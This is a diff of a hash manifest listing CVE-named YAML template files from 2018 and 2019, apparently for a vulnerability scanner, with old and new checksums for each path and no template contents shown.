-http/cves/2018/CVE-2018-12613.yaml:99590f3669fc44346e8c257278cfa01c62443357
-http/cves/2018/CVE-2018-12634.yaml:6d2b3c1707ed95eed2a66fce5d079d7f145ac5b4
-http/cves/2018/CVE-2018-12675.yaml:0ec8700460b98ae2cff61b661371731ec8331666
-http/cves/2018/CVE-2018-1271.yaml:c5b6468cc0c79e323bd05b8b23238e47648d1796
-http/cves/2018/CVE-2018-1273.yaml:df6d8c2c31de0691aa31b8cfff33d11375e50efc
+http/cves/2018/CVE-2018-1000533.yaml:a69046c6d821c68ed1189b1c726bede63634e971
+http/cves/2018/CVE-2018-1000600.yaml:b10e9ec0d01d002b85bacca57b85749a60ab8286
+http/cves/2018/CVE-2018-1000671.yaml:bd29670959a34423aeb1d87fa9d64a2fb38072eb
+http/cves/2018/CVE-2018-1000856.yaml:3848bcf92929711bc0e629c8f8bf556d4337deff
+http/cves/2018/CVE-2018-1000861.yaml:f0f7b99688663f92e55da84d62082f8a583e6ccf
+http/cves/2018/CVE-2018-10093.yaml:7f093c040d69a7aa82eba0738408391a640ae757
+http/cves/2018/CVE-2018-10095.yaml:f3e8d5c1c21b28450bd4713a3331026761fea089
+http/cves/2018/CVE-2018-10141.yaml:6ae82fbc1d60e822b65ada2bf279353d9b1f1549
+http/cves/2018/CVE-2018-10201.yaml:97c9c2ee081b7da0350f3886cdc5ad2521bb9dd3
+http/cves/2018/CVE-2018-10230.yaml:f6fb3c897eaedaaed9cf7a74693b57bfde6cc27a
+http/cves/2018/CVE-2018-10562.yaml:8170b4cf6f45b7a0e88dae31969423ceb300a933
+http/cves/2018/CVE-2018-10818.yaml:efa3271174cdf4babcac2932f09ca4d5e35b49d2
+http/cves/2018/CVE-2018-10822.yaml:3c917275eb39867b6b6a116a0742f37736d7779f
+http/cves/2018/CVE-2018-10823.yaml:c2d12216b6c1738ab4e94e4ab2fcc35ffac10a54
+http/cves/2018/CVE-2018-10956.yaml:bb577ef2c4a277b2092c75d6a2bb50b797ff54da
+http/cves/2018/CVE-2018-11227.yaml:d46885b957237a791d183aa90a5159c5f2135006
+http/cves/2018/CVE-2018-11231.yaml:272addd9101abfdaf4545ba444e6b8fba494719a
+http/cves/2018/CVE-2018-11409.yaml:c70993f7b5a5f4d82d77f68b33bce55967e5e360
+http/cves/2018/CVE-2018-11473.yaml:21a55dbb80e3bbfea1401212d68438051958eec4
+http/cves/2018/CVE-2018-11709.yaml:6783b9fb81429d60b9d74498d4863ece94d46d4f
+http/cves/2018/CVE-2018-11759.yaml:6fa3dde34a89565371feac981ddc3cadf8a08802
+http/cves/2018/CVE-2018-11776.yaml:58ad149ec4ff568b22520a61c50501ecc24262b0
+http/cves/2018/CVE-2018-11784.yaml:34913278bb4abb585ee0b4af8bb12f5ef0f6f52e
+http/cves/2018/CVE-2018-12031.yaml:c28ad724ef9b7c2698e3c0f01f3a03318ba2db69
+http/cves/2018/CVE-2018-12054.yaml:4fd5efc95fd31dd48f260bd70efef3272c72d87c
+http/cves/2018/CVE-2018-1207.yaml:2fbdba8ab06fb932347f39411bc533eba1e302b8
+http/cves/2018/CVE-2018-12095.yaml:6723a14791a043a11e1d4ce550166d5ac09d062f
+http/cves/2018/CVE-2018-12296.yaml:a008cb5e4ee1ad98b5506765e49564a5ff653aa8
+http/cves/2018/CVE-2018-12300.yaml:cd8a04b267914a614cf8d09da5dc49c0698fc6dc
+http/cves/2018/CVE-2018-12613.yaml:ce3030e3b0dbc27b243309abf32d0bd87b63698b
+http/cves/2018/CVE-2018-12634.yaml:3534b8a3d3615bddd4db21e792b000794a87ed6b
+http/cves/2018/CVE-2018-12675.yaml:83d99630ec3a17ffa1e7cebd7f9d60c5a597f577
+http/cves/2018/CVE-2018-1271.yaml:8541c9442f2f670ff648d1a0fa2155138ef21651
+http/cves/2018/CVE-2018-1273.yaml:55f68226afb756c91465f429115d5c099deeae98
 http/cves/2018/CVE-2018-12909.yaml:aeef91085b8292c4a399b137145d21236b5cb4b2
-http/cves/2018/CVE-2018-12998.yaml:8db2d20f4e9dc45cc595d6e4211bf885487872f1
-http/cves/2018/CVE-2018-1335.yaml:c891909630afdb52e1318dbeb0fd65ae12c68a58
-http/cves/2018/CVE-2018-13379.yaml:5507da336ba9e939577070e755f0174f424307d5
-http/cves/2018/CVE-2018-13380.yaml:14c70467b9172bb4e7ab2e93548af50fbbfed659
-http/cves/2018/CVE-2018-13980.yaml:32c18b79bc8ca960153b290278e55ca967efbd5f
-http/cves/2018/CVE-2018-14013.yaml:0662d9c5683ab59b8b9afa3cc5a6be05586c8649
+http/cves/2018/CVE-2018-12998.yaml:cfbd1338f7ab299ff04ed39fbeebb2cdfa8b01ac
+http/cves/2018/CVE-2018-1335.yaml:25147e8238bf81dcf2609b74ae5c984a06f368e3
+http/cves/2018/CVE-2018-13379.yaml:2fb0245ee30aeafb70e30fe45f1e2e9b04ca0394
+http/cves/2018/CVE-2018-13380.yaml:0038eb70326d459479036bd1bbefee347eb3081b
+http/cves/2018/CVE-2018-13980.yaml:06ab1b7fc2c830d9f926e1c96bade3bad19c5add
+http/cves/2018/CVE-2018-14013.yaml:a7769947596bca8862492363c6dd723d6843446d
 http/cves/2018/CVE-2018-14064.yaml:ffafb7e582fc0519697f5828de8567f592a8a857
-http/cves/2018/CVE-2018-14474.yaml:09c0e8259a607a2ccffe45009729e67d4af4622b
-http/cves/2018/CVE-2018-14574.yaml:f5ae2ada9a4c164a6b00213e39f11bd741d5a19f
-http/cves/2018/CVE-2018-14728.yaml:c4228d5ad91a736aa5e5dad534f902ef87096480
+http/cves/2018/CVE-2018-14474.yaml:6fbd6ea9d314924f4defb5b1870b0942436fd33f
+http/cves/2018/CVE-2018-14574.yaml:a3632a205e4c1a94d111de69b98fe2777ea36361
+http/cves/2018/CVE-2018-14728.yaml:66393440b4a5a92e8bc2840b24882d3c33409402
 http/cves/2018/CVE-2018-14912.yaml:de833253ceed6d2d1030601130ab1cf9adaec66e
-http/cves/2018/CVE-2018-14916.yaml:ce44d5c36993b8bf40d2700399fb9ec488a8137d
-http/cves/2018/CVE-2018-14918.yaml:8f1f6552fa36ec1eceefd048eb5e500ec994a7c4
-http/cves/2018/CVE-2018-14931.yaml:6ebb79b8c6fa134abc8000083ecd5a736ac9375f
-http/cves/2018/CVE-2018-15138.yaml:8bdb818d30022a56478ca4d7a65a482d40bf15c3
-http/cves/2018/CVE-2018-15517.yaml:b38e5b178d082bfa9fc8a24e2f5a82eed914e9ad
-http/cves/2018/CVE-2018-15535.yaml:3a7cfb633150ae215428e55d5672831483368f80
-http/cves/2018/CVE-2018-15745.yaml:c7b8249ecd14cac9c47286d928202ecdaf7c98b7
+http/cves/2018/CVE-2018-14916.yaml:d2ccb59afc5523dd8692e21246e7ff49960e5397
+http/cves/2018/CVE-2018-14918.yaml:e3b8ac962532de31cdd8dcd5b452ef27b574d60b
+http/cves/2018/CVE-2018-14931.yaml:71248f6252e29ebb19e20ec71e2370e8144d8273
+http/cves/2018/CVE-2018-15138.yaml:04479c172b79b7c8b59e17a95e3aea7f12c6f233
+http/cves/2018/CVE-2018-15517.yaml:3ecba2076959b04184882b880b86aa29c75aa4be
+http/cves/2018/CVE-2018-15535.yaml:0438b8e14445d6281200011ed2958966e770a313
+http/cves/2018/CVE-2018-15745.yaml:52b561ebec7b3d2e9b2085c4ccbb68c97c32c71b
 http/cves/2018/CVE-2018-15917.yaml:45514d4a358682537a42d451c719219d341a44de
-http/cves/2018/CVE-2018-15961.yaml:b276dac8de5949b6dc6dcf9122bbecd428edef1f
-http/cves/2018/CVE-2018-16059.yaml:d10da0e9a18d5619a40a56c64449c256f1bc0247
-http/cves/2018/CVE-2018-16133.yaml:642aedade817316bb6ee38a96e8dfcf8c89890ef
-http/cves/2018/CVE-2018-16139.yaml:54842a0b3ab615e223b7da75ddd5601504331f1c
-http/cves/2018/CVE-2018-16159.yaml:b1fdbf53e4d7896da31426aefb6a7b7cd7081d49
-http/cves/2018/CVE-2018-16167.yaml:a08a2704199a26a0cf966bb37597cf99e2485e71
+http/cves/2018/CVE-2018-15961.yaml:f61b311e45bf61971e33ae2c7a8d9b5a6fb6922a
+http/cves/2018/CVE-2018-16059.yaml:b725485b8595173bfed80e59906b0c7cb5fb2fb5
+http/cves/2018/CVE-2018-16133.yaml:bb729c2bae19f702f1e1a68afb712e759f7b48db
+http/cves/2018/CVE-2018-16139.yaml:1f4c8b6ab9fc340321fb233f79f5701eaa1bd2d2
+http/cves/2018/CVE-2018-16159.yaml:b67e9c42d7ebeb999262f28e7a20e9a550e2b735
+http/cves/2018/CVE-2018-16167.yaml:3b60f2bb393ba003c2f0ccd5c3f4e50c2bb07e35
 http/cves/2018/CVE-2018-16283.yaml:84d839580c52b33e85e2ef119d188dfc736567ba
-http/cves/2018/CVE-2018-16288.yaml:9336fd0b4e5e02fd667386ab580f7eec5706db07
-http/cves/2018/CVE-2018-16299.yaml:98851aabeef0d31f6727e4f54755c4b304861c1d
-http/cves/2018/CVE-2018-16341.yaml:5e98618d7cbe279b99ef854f2e8f3207a30272ac
-http/cves/2018/CVE-2018-16668.yaml:de88f8077eed0553e6b746f065f52442cd0ed872
+http/cves/2018/CVE-2018-16288.yaml:954c9fa261a4ca6ddcb92169fb691717042cd38f
+http/cves/2018/CVE-2018-16299.yaml:d976c9b984c26c1733a4652a7d425700052cfde2
+http/cves/2018/CVE-2018-16341.yaml:74ccee29760fe9aaf2616353755ab249f6f6fcfb
+http/cves/2018/CVE-2018-16668.yaml:fcf844110da9acc723c9459bc1422f2f3d74655d
 http/cves/2018/CVE-2018-16670.yaml:b4d0b8547ac53c6636f01c872b0d2c9c5e8fcc5a
-http/cves/2018/CVE-2018-16671.yaml:065f07306bee9b44d6f060813395dcced5834d9f
-http/cves/2018/CVE-2018-16716.yaml:8c683d29443e952a8e6d4d3718765aa9507b5108
-http/cves/2018/CVE-2018-16761.yaml:cf1f32a8502f248f4509e416949638cffb61876e
-http/cves/2018/CVE-2018-16763.yaml:ace7ebc9a971505759e3c7c027d658153005d2b8
-http/cves/2018/CVE-2018-16836.yaml:93447ec81147334c47fa0a476f35066e83f45ad5
-http/cves/2018/CVE-2018-16979.yaml:50d9c6603200262dd13da8159fecd793fbaefaee
-http/cves/2018/CVE-2018-17153.yaml:f4500603be81cd6d33cf6f5cc449cd33323c977e
-http/cves/2018/CVE-2018-17246.yaml:455af045a5dfd4cf3f13bed5be9e3c60d521e184
-http/cves/2018/CVE-2018-17254.yaml:374f852bf22a76f67616ee3976b82dde32646b60
-http/cves/2018/CVE-2018-17422.yaml:a45fbde72af0fc45b59fe8e9e702fb93a2cf18e8
-http/cves/2018/CVE-2018-17431.yaml:88edc16428924b53dabb47daeb62e1bba50d59f1
-http/cves/2018/CVE-2018-18069.yaml:bc061b5ee84bd6179fcfe3def3ae1c68415b32a4
-http/cves/2018/CVE-2018-18264.yaml:3308e93f0c80cb2062c3c90c621cf42e723b9b7b
-http/cves/2018/CVE-2018-18323.yaml:a03df734c7d3a15a3c5232c0140efd9d652c6769
-http/cves/2018/CVE-2018-18570.yaml:4b88f6e1b58d7633a7388019308f66a8f7fe4ba6
-http/cves/2018/CVE-2018-18608.yaml:d31bf545950d22f80baebaef43e41e02112023c0
-http/cves/2018/CVE-2018-18775.yaml:33200aea7d824b430e40317d646c45958b9a7a96
-http/cves/2018/CVE-2018-18777.yaml:2353ecba7c4c29f413527c00a6de5900fae3852b
-http/cves/2018/CVE-2018-18778.yaml:25d501d1a642c9f54283810b7cb2ac36c5d1b2f7
-http/cves/2018/CVE-2018-18809.yaml:eee6be9882e4cd75deeea2c59f8781807714f9a5
-http/cves/2018/CVE-2018-18925.yaml:009dab7ede3870998e9d6723e31416e97bbb4c15
-http/cves/2018/CVE-2018-19136.yaml:43ee12bb571de5e9a49fdf64388664c8aef6dec9
-http/cves/2018/CVE-2018-19137.yaml:3e18967d2a31b75e53428c99c3941086f3f519f1
-http/cves/2018/CVE-2018-19287.yaml:88cd497155690168f152dac5f3a2d0e2ebf886ba
-http/cves/2018/CVE-2018-19326.yaml:bcabdabfbdf0f7e48822a8c55810b890c3262dae
-http/cves/2018/CVE-2018-19365.yaml:6af6b11981d8d97a203fa721bfe93216034a733d
-http/cves/2018/CVE-2018-19386.yaml:aeb303be93f58df591de7aeee1081593343bc845
-http/cves/2018/CVE-2018-19439.yaml:862b94ce1a7b0705c63af2edf84795b1ec89d0e9
-http/cves/2018/CVE-2018-19458.yaml:344ffc950d275fd0342f1d04ce0094b1bcb2f86b
-http/cves/2018/CVE-2018-19749.yaml:ecf891dbb71463e87ae3c2fbe87235ad50d06be0
-http/cves/2018/CVE-2018-19751.yaml:0caa5843c0619f698f44add38c0da0ab596af42d
-http/cves/2018/CVE-2018-19752.yaml:71b28295fbe100497b6c8eff70751785e9275165
-http/cves/2018/CVE-2018-19753.yaml:e69b69b92b3ae5a5eb74b206d2fe70f3162afe3d
-http/cves/2018/CVE-2018-19877.yaml:31dd9e5478b19e20fed43111176dfa14b2a8f1df
-http/cves/2018/CVE-2018-19892.yaml:a82b825ac620bed105a13269de8f864c24bf775c
-http/cves/2018/CVE-2018-19914.yaml:63395b41fb1acd36b970788fd4296df365e3fa30
-http/cves/2018/CVE-2018-19915.yaml:88f1b1f9898a07b4721400c99ae7c3edb28ea962
-http/cves/2018/CVE-2018-20009.yaml:d2205fd355aecfa1d546cd18899e1fab56a5fe30
-http/cves/2018/CVE-2018-20010.yaml:b253126d7d11b0db03049052445811a236b6d3bc
-http/cves/2018/CVE-2018-20011.yaml:163a9296d082a7e75906da90497f930541f03f0c
-http/cves/2018/CVE-2018-20462.yaml:9141db6fc0ad1eb461448f737a92a5408e26e120
-http/cves/2018/CVE-2018-20463.yaml:1c371fbb27563060599eaecd601a258832f7907f
-http/cves/2018/CVE-2018-20470.yaml:d16b16de71fe4c893f6dbeefa24a3b07be8114eb
-http/cves/2018/CVE-2018-20526.yaml:caefe02c868335b016f24b9a940b1d4d5a017bb7
-http/cves/2018/CVE-2018-20608.yaml:08d75492cc89bd663db6b742be32bb7bba9c1678
-http/cves/2018/CVE-2018-20824.yaml:1ad7d69d2221bb4d1b1dac78f77ce5d49a3060fa
-http/cves/2018/CVE-2018-20985.yaml:332fc4832dd56df57c33d6cd4c3fc28d1c81482f
-http/cves/2018/CVE-2018-2392.yaml:361977e35764f0c0e28f8e09a4885c8d2fcf1db1
-http/cves/2018/CVE-2018-2791.yaml:5637bc9af89355acdac242aab526caa7273266b3
-http/cves/2018/CVE-2018-2894.yaml:b1fd8955e2d0f679185d7e017b81808d14adc009
-http/cves/2018/CVE-2018-3167.yaml:f9ca07787b97ec3de2538d323ef556b693c73614
-http/cves/2018/CVE-2018-3238.yaml:06c83f6d107515f0c0bd5b22bca651312c19e482
-http/cves/2018/CVE-2018-3714.yaml:05792de57ab6f39e78870901566a6feef7968cd6
-http/cves/2018/CVE-2018-3760.yaml:f0d6f4b3f5a65d29e63466ded1c9d7597562d307
-http/cves/2018/CVE-2018-3810.yaml:535ad6a09d3c1a1c95a3f422e159f943a5bdb5f4
-http/cves/2018/CVE-2018-5230.yaml:b873a21258759ed7b95c36ed8e6f522d5d20d772
+http/cves/2018/CVE-2018-16671.yaml:d62ceb53e96550b0e2432b8404a38459e1f49ce7
+http/cves/2018/CVE-2018-16716.yaml:514550a06f7da5613fd70c265ebd174575dc5168
+http/cves/2018/CVE-2018-16761.yaml:7b044ad99b8323d9c1e8363ec18c12ed02db02b8
+http/cves/2018/CVE-2018-16763.yaml:740786831138ec8274179bd69638c98c32269d57
+http/cves/2018/CVE-2018-16836.yaml:043ba8dbeff8f788bc4bd2e32b750f7f7e952bae
+http/cves/2018/CVE-2018-16979.yaml:6be6411454698c94e1f65d76142e623c2416c7d0
+http/cves/2018/CVE-2018-17153.yaml:c6f8aab393afbf888581006eaed4685fe9ef29eb
+http/cves/2018/CVE-2018-17246.yaml:409c7ad03e5aa5aba79ffa968f6f5862d5c38a28
+http/cves/2018/CVE-2018-17254.yaml:ba78c1a0725ff08fd91c3b9a4bfa9e4d18631174
+http/cves/2018/CVE-2018-17422.yaml:6f81bc9871e61807f41ba82a188c4c394a740fb5
+http/cves/2018/CVE-2018-17431.yaml:4f3fa6a77be76586758d668492a4f5940aa7208d
+http/cves/2018/CVE-2018-18069.yaml:7c0cf1773979ee23931ff6c25e606a77dee5b9df
+http/cves/2018/CVE-2018-18264.yaml:8fadba7af2ef8f6bb990d87113babb07de398a12
+http/cves/2018/CVE-2018-18323.yaml:3882238537f5836f09e7a8dc1f71aee483580f0c
+http/cves/2018/CVE-2018-18570.yaml:ccf23149a108dd4c4418dfcc9bb5b41995d270d9
+http/cves/2018/CVE-2018-18608.yaml:382fc89ea04ee73b9f4beb2d9fe75e123052b557
+http/cves/2018/CVE-2018-18775.yaml:14c6e7c8c3f415f74c3be98a3bc747d9a59cc3cf
+http/cves/2018/CVE-2018-18777.yaml:2f4b4efdcd746937a93182858bf4dc27ea8287dc
+http/cves/2018/CVE-2018-18778.yaml:52c6672be663992d51eb408a658e270b2a9c2620
+http/cves/2018/CVE-2018-18809.yaml:fc86c1a873e41605a7858cb3192a0e9ccb5c5500
+http/cves/2018/CVE-2018-18925.yaml:525a6ab868ff77829b4d07d2945b9a8bf56ebd13
+http/cves/2018/CVE-2018-19136.yaml:e7b5cc9bdbfbc5d9d69e30243db2cc14e9313182
+http/cves/2018/CVE-2018-19137.yaml:137d0f6fa5586f8391d0744b56e189210f90be1e
+http/cves/2018/CVE-2018-19287.yaml:2eaf07199c972448bfc9a2f19972c0f73e5da904
+http/cves/2018/CVE-2018-19326.yaml:92bbe00e68b3990a5d9a1b0ce70ff70e18fb0ba9
+http/cves/2018/CVE-2018-19365.yaml:ee30b50bc2514a1bf2c66c9ef79855215d2e8c79
+http/cves/2018/CVE-2018-19386.yaml:f185e03e32230ca6303654bd61bc51441f0c36b1
+http/cves/2018/CVE-2018-19439.yaml:c063b63f4fb3610c287a1fe4611dba37b314e538
+http/cves/2018/CVE-2018-19458.yaml:90bde067532dc3ab4a8c54d2e6d9459de0ec10f1
+http/cves/2018/CVE-2018-19749.yaml:4a7c98f9317f538fb820f5864dea8f3f294a74d1
+http/cves/2018/CVE-2018-19751.yaml:d784e0137821c51ec168375c7a19ca2c427e6fab
+http/cves/2018/CVE-2018-19752.yaml:c1ed7edfbccf81a010c9495131acbf07f7cb987c
+http/cves/2018/CVE-2018-19753.yaml:cd027a3cba8cd9faa2c0b54f7d45fc75fe189cf8
+http/cves/2018/CVE-2018-19877.yaml:825c420507d63d986f27f5f56d2c0c78ba156f4b
+http/cves/2018/CVE-2018-19892.yaml:9da029436a8c5ae1fa0defaaee49fad762c4795d
+http/cves/2018/CVE-2018-19914.yaml:24ce7b2f8d2f59fe9c748825af3d8d823f4e0788
+http/cves/2018/CVE-2018-19915.yaml:7d8d3be97c2e72b34933ac925ca54b758f2186be
+http/cves/2018/CVE-2018-20009.yaml:4ebf4fb0125d82421430496707aefd6fc24e0a8e
+http/cves/2018/CVE-2018-20010.yaml:79345de2b3c7dfc667ed7b5932d0bff51115830d
+http/cves/2018/CVE-2018-20011.yaml:1b959869ffcddb81c47dc9c1f85606cf61e8fd3b
+http/cves/2018/CVE-2018-20462.yaml:ad79a6619293d2e3730ec19288bd867c5f1fd990
+http/cves/2018/CVE-2018-20463.yaml:f9a1a1f75b615dae11a0524c2b99e8fe0a158968
+http/cves/2018/CVE-2018-20470.yaml:4bfb95fd31addb1c7c46a0162ff601358114d39e
+http/cves/2018/CVE-2018-20526.yaml:0dcd660574ccd71fd5ecc0aa6189dd82bff22022
+http/cves/2018/CVE-2018-20608.yaml:b0cd3ad5db99d410afdc09b510e70c4a8ddfa64e
+http/cves/2018/CVE-2018-20824.yaml:e1620ceff3e66f4d6b20d672c8272a853f6ef331
+http/cves/2018/CVE-2018-20985.yaml:630e41074ea361d71729bfc0976163cb5fffbe46
+http/cves/2018/CVE-2018-2392.yaml:fc1155b966ee49140d2320bc0509ea9c1766531f
+http/cves/2018/CVE-2018-2791.yaml:fc2564d4f5439a97725891604f392b6233721b55
+http/cves/2018/CVE-2018-2894.yaml:ae25c4bfd1478ba11901ea7e77c0ed693a500900
+http/cves/2018/CVE-2018-3167.yaml:50fae61533067fac0c61bd49ac6fb8844d096f55
+http/cves/2018/CVE-2018-3238.yaml:55703e0523adc692348f7eaab341b2ac2dc90277
+http/cves/2018/CVE-2018-3714.yaml:ea243dd765899ecc99dabb2750b0f09ad661b5b0
+http/cves/2018/CVE-2018-3760.yaml:9d9190b07f74de4954bf0a12f4381a24c564f25d
+http/cves/2018/CVE-2018-3810.yaml:c1d18710533785585edff11e8a47aaedac124825
+http/cves/2018/CVE-2018-5230.yaml:299b796729811fb1dbd8cd0d421f206b3784a540
 http/cves/2018/CVE-2018-5233.yaml:307a40ca83f7ee169372fb6f42e1a966000ab2f3
-http/cves/2018/CVE-2018-5316.yaml:482829a85eb908faecedf7ef9dba5ed764766a10
-http/cves/2018/CVE-2018-5715.yaml:8bb6b18236f3b9fa9809cae3651382e0cce84330
-http/cves/2018/CVE-2018-6008.yaml:f6e04fa9ae2df75c9ac7ccf3b1f3cd2b5738f104
-http/cves/2018/CVE-2018-6184.yaml:0f3d3f722d26a393eeab8f11c583e9b95a7173bc
-http/cves/2018/CVE-2018-6200.yaml:97b7fd906f7f2866e11948c8fe1f95200b83cb46
-http/cves/2018/CVE-2018-6530.yaml:43a5ec167be60ee37df69b81a092ee00ffd8cf72
-http/cves/2018/CVE-2018-6910.yaml:aa83d2096f1872bac414e317d24cfaefd4b9c5e9
-http/cves/2018/CVE-2018-7251.yaml:9e4fd8c455e75fc1d7f9c3938ac932bf93d2c192
+http/cves/2018/CVE-2018-5316.yaml:3449079e17e1586133dc273a07a573bd433136ee
+http/cves/2018/CVE-2018-5715.yaml:734a4a849e99ac15473ea37e045e2ece2a79c8de
+http/cves/2018/CVE-2018-6008.yaml:15d2e43f3b7a042062cf9b11eeb49acadffa0f28
+http/cves/2018/CVE-2018-6184.yaml:e9b0abac3fa2a4e19de61646e6851ab2365859bf
+http/cves/2018/CVE-2018-6200.yaml:1b206efde232c3631b917fdfb326c3198d9c6224
+http/cves/2018/CVE-2018-6530.yaml:1aab0132675170dedbd01bd0edc7b98326533a60
+http/cves/2018/CVE-2018-6910.yaml:86273b458c6738d06761635c014af682f52a3bd6
+http/cves/2018/CVE-2018-7251.yaml:4901cb9e0d3bcbb72424e69cbba843ea813c8884
 http/cves/2018/CVE-2018-7282.yaml:fa5be5c11bb1e9d4debf9822fde27a42ec10747a
-http/cves/2018/CVE-2018-7422.yaml:b9c4a1f40560a75db4bdcd1b05448b30b4e88cea
-http/cves/2018/CVE-2018-7467.yaml:4e03226306691f98295f0b4508152c8be3cb714b
-http/cves/2018/CVE-2018-7490.yaml:17e041c00274df1b3e8a420b38c17ad3803b9a92
-http/cves/2018/CVE-2018-7600.yaml:5d4d573d601eec90133cb7bdd610747c96437a44
-http/cves/2018/CVE-2018-7602.yaml:08aedb87a105d43e1714a3b29f7f05fb90198d76
+http/cves/2018/CVE-2018-7422.yaml:33a487fceb6dff8e53aff7f44f0c868d42dbe9fc
+http/cves/2018/CVE-2018-7467.yaml:98545f93640a737b8483550a77272ad611135a94
+http/cves/2018/CVE-2018-7490.yaml:78a349d67f6f03a65d7021cf7a2e60b963328c41
+http/cves/2018/CVE-2018-7600.yaml:e7e3cb8580ad1917b860d866f894ddae9e357257
+http/cves/2018/CVE-2018-7602.yaml:dca7b590e5c976bc3b4a9c80029b0b258857a2b8
 http/cves/2018/CVE-2018-7653.yaml:703910db748c89e1a98f9c196f082e2d521a1243
-http/cves/2018/CVE-2018-7662.yaml:78f39e4b8e7f79a90962b4bc20217c65d50ad832
-http/cves/2018/CVE-2018-7700.yaml:c476e7b922e516410c35071b8cbd6dcbe6a6871a
-http/cves/2018/CVE-2018-7719.yaml:bee8817d09c010be4a26ef806d1022ca56f3f1ce
-http/cves/2018/CVE-2018-8006.yaml:934e28dd0f4aafbd17c7dfc1b1a3e6cd03d15be9
-http/cves/2018/CVE-2018-8033.yaml:7f4d9e6062f6ea25ea0dd9e491cf33ef8dcf0b0f
-http/cves/2018/CVE-2018-8715.yaml:13182d01aa99a2fe6292b4d1b5fe24901ad0f782
-http/cves/2018/CVE-2018-8719.yaml:210e46e563547e569f558154e5d28884a4b63790
-http/cves/2018/CVE-2018-8727.yaml:b865c16afb0f593c86c9e7c10246e353b43e0dd6
-http/cves/2018/CVE-2018-8770.yaml:e70283bb1d2dcb102cd18c96d99e8206e88bcd74
+http/cves/2018/CVE-2018-7662.yaml:56f51e240260f1bea6b61465066e7fecb5ca1889
+http/cves/2018/CVE-2018-7700.yaml:4ec3f54a99ce451f6d465c6a124087fe7a893dd6
+http/cves/2018/CVE-2018-7719.yaml:beece4b144506e226e26b175ae33c46ee3a5ec97
+http/cves/2018/CVE-2018-8006.yaml:2b457794267576ade05ec5c28a3fdfad5e72fbc9
+http/cves/2018/CVE-2018-8033.yaml:97ae7108e4d4db2d2630d07d4987be81a0f9fb23
+http/cves/2018/CVE-2018-8715.yaml:4c3e4b8f3caa98e6aba3deec5e256f0a80e0488c
+http/cves/2018/CVE-2018-8719.yaml:d44cd29995f702b2ca58ead92abfa68cfe45dd11
+http/cves/2018/CVE-2018-8727.yaml:7b6e2e017292476c35d30d03fc68f699bb275222
+http/cves/2018/CVE-2018-8770.yaml:bec1e97c65c353ffe8d712fe632fd86e2c74fdb0
 http/cves/2018/CVE-2018-8823.yaml:7d05ae31f08d1e566025cf331325a8f03c56ae15
-http/cves/2018/CVE-2018-9118.yaml:db09f5c8622cbb524160f5ef3ed7c922c6d9297f
-http/cves/2018/CVE-2018-9161.yaml:9dacbe015eecfc3ed8979df534ecc0aa7f9b42c9
+http/cves/2018/CVE-2018-9118.yaml:4ae6a54d079a6f7ef2b133692b285be845258d09
+http/cves/2018/CVE-2018-9161.yaml:70ad0361f6188f82a7a254533927813e681939ef
 http/cves/2018/CVE-2018-9205.yaml:9b8b03bbfc788d2b7aa730b0e1c0a402e994ead8
-http/cves/2018/CVE-2018-9845.yaml:9b4403020a698bfb72e79cd1b31c3f90c4a5dadf
-http/cves/2018/CVE-2018-9995.yaml:1bb8cce1e7155dfaf352d4c2b7543b33fe0a5a8b
-http/cves/2019/CVE-2019-0193.yaml:1e3d262ae819840e6448905e2d8fde2dba031575
-http/cves/2019/CVE-2019-0221.yaml:c5947bec74fd2570ea016d3f4dfed383c4e31d35
-http/cves/2019/CVE-2019-0230.yaml:69e2db91953c972adb3e625d2ef5282157fc06ee
-http/cves/2019/CVE-2019-10068.yaml:e78b9981b4ef797bf8901aaceebf6aa1429b280b
-http/cves/2019/CVE-2019-10092.yaml:35b13ed2a9d250e163fb5370e624e5f1e9deb81f
-http/cves/2019/CVE-2019-10098.yaml:bf49c22658e90a57786a3c7db94df0bc3d8363eb
-http/cves/2019/CVE-2019-1010287.yaml:d89fef0a6e008e4be47e9746cde1a24113b2d496
-http/cves/2019/CVE-2019-1010290.yaml:3e7f238d1ae5c2b03c2971c6b41ecb6c443a634b
-http/cves/2019/CVE-2019-10232.yaml:e37d8d5cf0401cb78508ed277f047cd5036913c5
-http/cves/2019/CVE-2019-10405.yaml:9f46de1411dde1a20105e71255a4d6abf25899b1
-http/cves/2019/CVE-2019-10475.yaml:fe4d0c226c075610cf46eb56aa0923106f12883c
-http/cves/2019/CVE-2019-10692.yaml:1c81b32dfe0be66d86a1489107e1ed13cea9cb88
-http/cves/2019/CVE-2019-10717.yaml:aaaa17dd93a6c946011e2218d6a607bd7c65b790
-http/cves/2019/CVE-2019-10758.yaml:bd1b9de2ac0562ca658fe0009320a1fb8ac1d8d6
-http/cves/2019/CVE-2019-11013.yaml:329d810fc677e9a0c7bdebefd3eafdc3c8a570ce
-http/cves/2019/CVE-2019-11248.yaml:26a889f2caa4014475d54a94cfc4aa8501ea9bee
-http/cves/2019/CVE-2019-11370.yaml:767d721f71c53ae260d57947d682e95c3de891eb
-http/cves/2019/CVE-2019-11510.yaml:8242a85142f4197858c89387cce303f03ff79a73
-http/cves/2019/CVE-2019-11580.yaml:c061a795ca0bc46a782ae8a842e4f84a24c45226
-http/cves/2019/CVE-2019-11581.yaml:1bb3c96fae321b34054553f15842f3946290b998
-http/cves/2019/CVE-2019-11869.yaml:10cd16a996b446ff9137485638ac1ee4f37b78e1
-http/cves/2019/CVE-2019-12276.yaml:46ef710523c6995d50133322dd1f4c90b38475f7
-http/cves/2019/CVE-2019-12314.yaml:63684ab90c2989e84f1c73d2cf0c22bcaa12a398
-http/cves/2019/CVE-2019-12461.yaml:304a425dbfd3441ddc5041e4f95694bb0d1dccb9
-http/cves/2019/CVE-2019-12581.yaml:69815cada4fa5be6953ca00c9c43be060ce4a2a0
-http/cves/2019/CVE-2019-12583.yaml:d19839927de99e211df9310e6e7f600067b0bb69
-http/cves/2019/CVE-2019-12593.yaml:bbf7b9329bc6c2fc5ca86c6bd09395642c9e35c5
-http/cves/2019/CVE-2019-12616.yaml:089ccb482185b5d5a7fcfbd4711634bde18a199e
-http/cves/2019/CVE-2019-12725.yaml:fce978428f1f426627546abb9d195b710842a3d8
+http/cves/2018/CVE-2018-9845.yaml:4df8f3c3a6280263e310103834ad652a960bf2ec
+http/cves/2018/CVE-2018-9995.yaml:9731a4d5885d174822384fb90320c8aa00764ee8
+http/cves/2019/CVE-2019-0193.yaml:cee367d358900af4c2fff6991a5a4f7144eae4c7
+http/cves/2019/CVE-2019-0221.yaml:995605bda369c812082a9d15dc2a605192ca578c
+http/cves/2019/CVE-2019-0230.yaml:aa05f8b349286839655bc4922ba07bbea20af330
